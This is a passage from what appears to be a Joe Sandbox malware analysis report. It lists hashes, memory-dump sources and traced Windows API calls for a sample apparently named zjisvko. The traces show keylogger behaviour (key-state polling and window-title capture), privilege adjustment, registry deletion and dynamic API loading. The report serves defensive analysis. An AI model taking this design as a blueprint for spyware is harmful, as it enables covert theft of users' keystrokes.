                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileFind$lstrcatwsprintf$AttributesCloseFirstNextSleeplstrcpy
                                                                                                                                                                                                                                                      • String ID: %s\%s$%s\*
                                                                                                                                                                                                                                                      • API String ID: 2421785216-2848263008
                                                                                                                                                                                                                                                      • Opcode ID: 4a7a8562fb6de0a137325da55f563f4c68a4949db7d4457257728d2b58b9eea9
                                                                                                                                                                                                                                                      • Instruction ID: 0ecd25e5d59f9a0595605ca4691443b617c16b77e013c2d7aa34b0ccf6123ddf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a7a8562fb6de0a137325da55f563f4c68a4949db7d4457257728d2b58b9eea9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 923159B290021DABCF21ABA0DD89FDE777CEB14314F4044A3F905E6050DA749BA5CF55
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000005,?,76AF0440,00000000), ref: 00407864
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00407883
                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 00407896
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004078D4
                                                                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(00000000,00000010), ref: 0040798E
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 004079BA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Find$Filewsprintf$CloseFirstNextSleep
                                                                                                                                                                                                                                                      • String ID: %s\%s$%s\*$.exe
                                                                                                                                                                                                                                                      • API String ID: 1758027058-2151574129
                                                                                                                                                                                                                                                      • Opcode ID: 5f073de3dcff7f9fe1fd304a7e1876fc0275856f7beec281107b431e190248e2
                                                                                                                                                                                                                                                      • Instruction ID: 163c00c7d8bbd4ad810b400cbd44254186020fd6e3715fb87303bc0dc3067a1c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f073de3dcff7f9fe1fd304a7e1876fc0275856f7beec281107b431e190248e2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8141D772E082285BEF30A7A09D48BDE77AC9F45315F1400B7ED44F2191D77CAA84CB5A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,0040D4C0,76AF0F00,?,00413DE4,SeShutdownPrivilege,00000001,0040D4C0), ref: 00413D5A
                                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,00413DE4,SeShutdownPrivilege,00000001,0040D4C0), ref: 00413D61
                                                                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 00413D74
                                                                                                                                                                                                                                                      • OpenThreadToken.ADVAPI32(00000000,?,00413DE4,SeShutdownPrivilege,00000001,0040D4C0), ref: 00413D7B
                                                                                                                                                                                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,00000001,=A), ref: 00413D99
                                                                                                                                                                                                                                                      • AdjustTokenPrivileges.KERNELBASE(0040D4C0,00000000,?,00000000,00000000,00000000), ref: 00413DC2
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(0040D4C0,?,00413DE4,SeShutdownPrivilege,00000001,0040D4C0), ref: 00413DCD
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Token$CurrentOpenProcessThread$AdjustCloseHandleLookupPrivilegePrivilegesValue
                                                                                                                                                                                                                                                      • String ID: =A
                                                                                                                                                                                                                                                      • API String ID: 2466252811-2399317284
                                                                                                                                                                                                                                                      • Opcode ID: 4fe2538e3e2ea93d9b9fbef1b55b33063fb91e0da2af47dccb38c6a48e1a1dd9
                                                                                                                                                                                                                                                      • Instruction ID: 475d8baa3e36ee8e1e9a3101c06148507bb2b604236046abb380cd1cc11b1ce2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4fe2538e3e2ea93d9b9fbef1b55b33063fb91e0da2af47dccb38c6a48e1a1dd9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF112A71A01218FFDB109FA09D09DEF7ABCEF04742F504066F901E2150DA349F459BA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040F4D5
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040FA52
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(0042A784,776AC310,00000001,0042A784,0040DAA0,00000001,0042A784), ref: 00413799
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(00000001), ref: 0041379F
                                                                                                                                                                                                                                                      • gethostname.WS2_32(?,00000080), ref: 0040FAA9
                                                                                                                                                                                                                                                      • gethostbyname.WS2_32(?), ref: 0040FAB6
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$CountSleepTickgethostbynamegethostname
                                                                                                                                                                                                                                                      • String ID: IP: $asdf
                                                                                                                                                                                                                                                      • API String ID: 452584736-2391607419
                                                                                                                                                                                                                                                      • Opcode ID: 675ad9c3315867715e073771c222b3fc62d84ebd2aaea0f34cbab47e72c131b5
                                                                                                                                                                                                                                                      • Instruction ID: ab9c753e390d52234ecca9495911783dd6aac38805f13ab3233c2d1990d96d36
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 675ad9c3315867715e073771c222b3fc62d84ebd2aaea0f34cbab47e72c131b5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF0228B2A00248ABDB31EBA4CC51BEB739DAB09304F440477F544B65C3D67C9E4D8B6A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: EnterCriticalSection.KERNEL32(0044F7E0), ref: 00405B51
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: GetDesktopWindow.USER32 ref: 00405B68
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: GetWindowRect.USER32(00000000), ref: 00405B6F
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: SHDeleteKeyA.SHLWAPI(80000002,00000000), ref: 00405BCA
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: SHDeleteKeyA.SHLWAPI(80000002,00000000), ref: 00405BEB
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: RegCreateKeyExA.KERNEL32(80000002,00000000,00000000,?,00000000), ref: 00405C17
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: RegDeleteValueA.KERNEL32(?,00000000), ref: 00405C37
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: RegCloseKey.ADVAPI32(?), ref: 00405C40
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: lstrlenA.KERNEL32(?), ref: 00405C70
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00405F9D
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000BB8,00000001), ref: 00405FA8
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00405FB6
                                                                                                                                                                                                                                                      • EnumWindows.USER32(00405D79,00000000), ref: 00405FC1
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000000C8), ref: 00405FCC
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Delete$CountSleepTickWindow$CloseCreateCriticalDesktopEnterEnumRectSectionValueWindowslstrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 281037392-0
                                                                                                                                                                                                                                                      • Opcode ID: 6e28c6a7874f98d17b639abd47b63a2de883149d4e808e2792f3a1761e57c11a
                                                                                                                                                                                                                                                      • Instruction ID: c11db00c360bf4b784d5b7d7eeec3b580e66b8c7e3f3393114e085b604093c77
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e28c6a7874f98d17b639abd47b63a2de883149d4e808e2792f3a1761e57c11a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AFF02720285A0A9BD52077A18D86F7F3614DB14B04F60003BB944B72C1AEBC5815C9BF
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CursorSleep
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4211308429-0
                                                                                                                                                                                                                                                      • Opcode ID: a18abad0d9134f67dbb407c31c5c62fbab7a71adb5fb281b7f8a0cd74ff0b0b2
                                                                                                                                                                                                                                                      • Instruction ID: ec4e0dc912df284146a4d6c4ec45948b48cf9508f1cb833489b9ad9e6170350e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a18abad0d9134f67dbb407c31c5c62fbab7a71adb5fb281b7f8a0cd74ff0b0b2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8E0ED32804218EBDB219B95D8896AE7739F741721F610265D801732818A787E429AF9

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 0 4095b5-4095c8 1 4095d5-4095db 0->1 2 4095ca-4095cf Sleep 1->2 3 4095dd 1->3 2->1 4 4095f1-4095fb call 40c472 3->4 7 4095fd-40a67b call 421c60 4->7 8 4095df-4095eb Sleep 4->8 11 40a938-40a93e 7->11 8->4 12 40a680-40a691 Sleep 11->12 13 40a944 11->13 14 40a694-40a6b2 GetKeyState GetAsyncKeyState 12->14 13->1 15 40a724-40a732 14->15 16 40a6b4-40a6bf GetKeyState 14->16 17 40a923-40a932 15->17 18 40a738-40a766 GetForegroundWindow GetWindowTextA lstrlenA 15->18 19 40a6c1-40a6c5 16->19 20 40a6de-40a6e9 GetKeyState 16->20 17->11 17->14 21 40a768-40a76b 18->21 22 40a76d-40a772 18->22 19->20 23 40a6c7-40a6ca 19->23 24 40a707-40a70a 20->24 25 40a6eb-40a6ee 20->25 26 40a774-40a77d 21->26 22->26 23->20 27 40a6cc-40a6cf 23->27 29 40a719 24->29 30 40a70c-40a717 24->30 28 40a6f0-40a6f3 25->28 25->29 31 40a78c-40a793 26->31 32 40a77f-40a782 26->32 27->20 33 40a6d1-40a6dc 27->33 28->24 34 40a6f5-40a6f8 28->34 29->15 30->15 31->17 36 40a799-40a79c 31->36 32->31 35 40a784-40a787 32->35 33->15 34->24 37 40a6fa-40a705 34->37 38 40a815-40a821 lstrlenA 35->38 36->17 39 40a7a2-40a7a5 36->39 37->15 40 40a823-40a826 38->40 41 40a84c-40a851 call 409530 38->41 39->17 42 40a7ab-40a7ae 39->42 43 40a856-40a85f 40->43 44 40a828-40a82b 40->44 41->17 42->17 45 40a7b4-40a7b7 42->45 51 40a865-40a876 lstrcatA 43->51 52 40a8ef-40a8fb 43->52 44->17 47 40a831-40a83a lstrlenA 44->47 48 40a7c2-40a7c5 45->48 49 40a7b9-40a7bc 45->49 47->17 53 40a840-40a846 lstrcatA 47->53 48->17 56 40a7cb-40a7ce 48->56 49->17 49->48 57 40a880-40a8c0 lstrcatA * 4 lstrlenA 51->57 58 40a878-40a87e lstrcatA 51->58 54 40a90d-40a90f 52->54 55 40a8fd-40a90b lstrcatA 52->55 53->41 54->17 61 40a911-40a91d lstrcatA 54->61 55->17 56->17 62 40a7d4-40a7d7 56->62 59 40a8c2-40a8cf call 411574 57->59 60 40a8e3-40a8ed call 40c472 57->60 58->57 59->60 60->52 71 40a8d1-40a8dd Sleep 60->71 61->17 62->17 65 40a7dd-40a7e0 62->65 66 40a7e2-40a7e5 65->66 67 40a7eb-40a7ee 65->67 66->17 66->67 67->17 70 40a7f4-40a7f7 67->70 70->17 72 40a7fd-40a803 70->72 71->60 72->17 73 40a809-40a80f 72->73 73->17 73->38
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00007530), ref: 004095CF
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000EA60), ref: 004095EB
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 0040A682
                                                                                                                                                                                                                                                      • GetKeyState.USER32(00000010), ref: 0040A696
                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(?), ref: 0040A6A8
                                                                                                                                                                                                                                                      • GetKeyState.USER32(00000014), ref: 0040A6B6
                                                                                                                                                                                                                                                      • GetKeyState.USER32(00000014), ref: 0040A6E0
                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 0040A73A
                                                                                                                                                                                                                                                      • GetWindowTextA.USER32(00000000,?,000000C7), ref: 0040A750
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040A75D
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00457AB8), ref: 0040A816
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00457AB8), ref: 0040A832
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00457AB8,0042A4DC), ref: 0040A846
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: State$Sleeplstrlen$Window$AsyncForegroundTextlstrcat
                                                                                                                                                                                                                                                      • String ID: $ $!$!$"$"$#$#$$$$$%$&$'$($)$*$*$*$+$+$+$,$,$-$-$-$-$/$/$/$0$0$0$0$1$1$1$1$2$2$2$2$3$3$3$3$4$4$4$4$5$5$5$5$6$6$6$6$7$7$7$7$8$8$8$8$9$9$9$9$:$;$<$=$>$?$@$A$A$B$B$C$C$D$D$E$E$F$F$G$G$H$H$I$I$J$J$K$K$L$L$M$M$N$N$O$O$P$P$Q$Q$R$R$S$S$T$T$U$U$V$V$W$W$X$X$Y$Y$Z$Z$[$[$[<]$[<]$[C]$[T]$[T]$\$\$]$^$_$`$`$a$a$b$b$c$c$d$d$e$e$f$f$g$g$h$h$i$i$j$j$k$k$l$m$m$n$n$o$o$p$p$q$q$r$r$s$s$t$t$u$u$v$v$w$w$x$x$y$y$z$z${${$|$}$~
                                                                                                                                                                                                                                                      • API String ID: 3575194195-2271419567
                                                                                                                                                                                                                                                      • Opcode ID: 6cda244e52db42d6c007d4501fa802595a9ecb9f91306f0074cf77608459415e
                                                                                                                                                                                                                                                      • Instruction ID: df153dc5a53d45ebde2be742832d1a1b3fb3dbbf52d9bd87248e0ab54d23e74c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6cda244e52db42d6c007d4501fa802595a9ecb9f91306f0074cf77608459415e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5AB2FB75924628AEDB62CB68CC053DBBBB1AF48345F4148E5C20CF7150DBB56F898F4A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,776AC310,00000000,00000000), ref: 0040A96C
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040A99C
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040A9BB
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040A9DA
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040A9F9
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AA18
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AA37
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AA56
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AA75
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AA94
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AAB3
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AAD2
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AAF1
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AB10
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AB2F
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AB4E
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040ABCF
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040ABE1
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(00000000), ref: 0040AC0D
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AC35
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AC54
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AC73
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AC92
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040ACB1
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040ACD0
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040ACEF
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AD0E
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AD2D
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AD4C
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040ADB9
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040ADD8
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040ADF7
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AE16
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AE5B
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AE7A
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AE99
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AEB8
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AED7
